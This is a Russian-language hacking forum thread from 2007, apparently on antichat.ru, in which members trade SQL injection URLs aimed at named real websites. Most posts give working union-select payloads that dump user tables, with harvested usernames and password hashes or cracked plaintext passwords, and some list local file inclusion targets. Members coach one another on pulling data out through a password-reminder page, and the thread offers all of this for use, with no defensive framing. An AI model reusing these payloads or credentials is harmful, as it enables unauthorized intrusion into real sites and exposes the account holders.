 |
|
13.02.2007, 01:00
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Код:
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5f |
|
|
13.02.2007, 01:05
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от n0ne
Код:
http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/*
patrick:7a2eb41a38a8f4e39c1586649da21e5fpatrick:helen
|
|
|
|
13.02.2007, 01:09
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
Сообщение от Goudini
}{0TT@БЬ)Ч
юзай поиск по форуму, про эту скулю я писал раньше
http://forum.antichat.ru/showpost.php?p=285086&postcount=482
хмм у меня поиск не находит видать потому что в коде постишь 
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные? 
Последний раз редактировалось }{0TT@БЬ)Ч; 13.02.2007 в 01:36..
|
|
|
|
13.02.2007, 01:44
|
|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
|
|
Код:
http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd),3,4+from+users/*
admins:mikahakka |
|
|
|
13.02.2007, 02:18
|
|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами:
10130311
Репутация:
183
|
|
Сообщение от }{0TT@БЬ)Ч
хмм у меня поиск не находит видать потому что в коде постишь
Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+fr om+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные? Вот держи:
Код:
http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users+limit+0,1/*&remindway=secretq&subm2.x=28&subm2.y=6
andrey:asdfgh
Данные выводятся под строкой "Секретный вопрос:" 
Последний раз редактировалось +StArT+; 13.02.2007 в 02:23..
|
|
|
|
13.02.2007, 04:29
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 13
С нами:
10286153
Репутация:
34
|
|
Вот, нарыл:
_http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
_http://hockey.sport.com.ua/news.phtml?id=999999+union+select+username,passwor d,3,4,5,6,7,8,9,10,11,12+from+users/*
_http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,11,12,13
_http://www.lv.ukrtelecom.ua/ua/hot_news/?id=202
|
|
|
|
13.02.2007, 07:03
|
|
Новичок
Регистрация: 18.08.2005
Сообщений: 19
С нами:
10909868
Репутация:
36
|
|
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
|
|
|
|
13.02.2007, 08:06
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от Satirik
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
К чему в этом топе локальный инклуд? =\
|
|
|
|
13.02.2007, 08:40
|
|
Новичок
Регистрация: 18.08.2005
Сообщений: 19
С нами:
10909868
Репутация:
36
|
|
я же специально написал ...***Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.***
Все равно сюда за *халявой* идут  |
|
|
|
13.02.2007, 09:11
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от Satirik
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(databas e(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17+from+php bb_users+limit+1,1/*
etc...
а инклуд на HUT'e вообще бред выкладывать =)
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Линейный вид
